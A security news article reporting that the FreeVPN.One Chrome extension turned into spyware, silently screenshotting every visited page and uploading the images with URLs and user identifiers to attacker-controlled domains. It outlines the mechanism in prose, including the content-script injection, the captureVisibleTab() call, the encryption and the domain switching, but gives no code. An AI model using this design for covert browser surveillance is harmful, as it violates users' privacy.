Trusted Chrome VPN Caught Spying on Users
▼ Summary
– FreeVPN.One, a Chrome extension with over 100,000 installs, turned malicious and is now spying on users’ online activities.
– The extension began its malicious behavior after an update in April 2025, which allowed it to access all sites a user visits.
– In July 2025, it started silently capturing screenshots of every webpage and collecting sensitive personal information without user consent.
– It uses a two-stage process involving content scripts and Chrome’s API to take and upload screenshots and data to an attacker-controlled domain.
– The developer added encryption and domain changes to obfuscate the activity, and a fake “Scan with AI” feature serves as a smokescreen.
A widely used Chrome VPN extension, previously trusted by over a hundred thousand users, has been exposed as a sophisticated spyware tool actively harvesting personal data without consent. The FreeVPN.One extension, which once appeared legitimate and even carried Google’s “Verified” status, began secretly capturing screenshots of users’ browsing activity and exfiltrating sensitive information following a series of deceptive updates earlier this year.
Researchers at Koi Security uncovered the malicious behavior after tracking several updates to the extension. In April 2025, version 3.0.3 introduced broad new permissions that allowed the VPN to monitor every site a user visited. Although initially limited, this change laid the groundwork for more invasive actions. By mid-July, with the release of version 3.1.3, the extension started silently taking screenshots of active browser tabs and collecting personal data.
The surveillance mechanism operates through a two-stage process. A content script is injected into all HTTP and HTTPS pages, followed by a deliberate 1.1-second delay to ensure full page loading. A background service worker then uses Chrome’s captureVisibleTab() API to take a screenshot without any visual indication. Each image, along with the page URL, tab ID, and a unique user identifier, is uploaded to a remote server controlled by the attackers.
To conceal its activities, the developers later incorporated AES-256 encryption and switched domains, moving from aitd.one to a new subdomain, scan.aitd.one. Researchers believe this was a deliberate attempt to evade detection and obscure data exfiltration paths.
A feature labeled “Scan with AI Threat Detection,” introduced in a July update, attempted to legitimize the screenshot collection by referencing it in the privacy policy. However, security experts have dismissed this as a diversion tactic meant to mislead users about the true intent of the data harvesting.
The extension had accumulated a 3.8-star rating from more than a thousand reviews before its malicious turn, highlighting how easily harmful software can masquerade as legitimate services in official marketplaces. Users are urged to exercise extreme caution with free VPN offerings and regularly review extension permissions.
(Source: InfoSecurity)
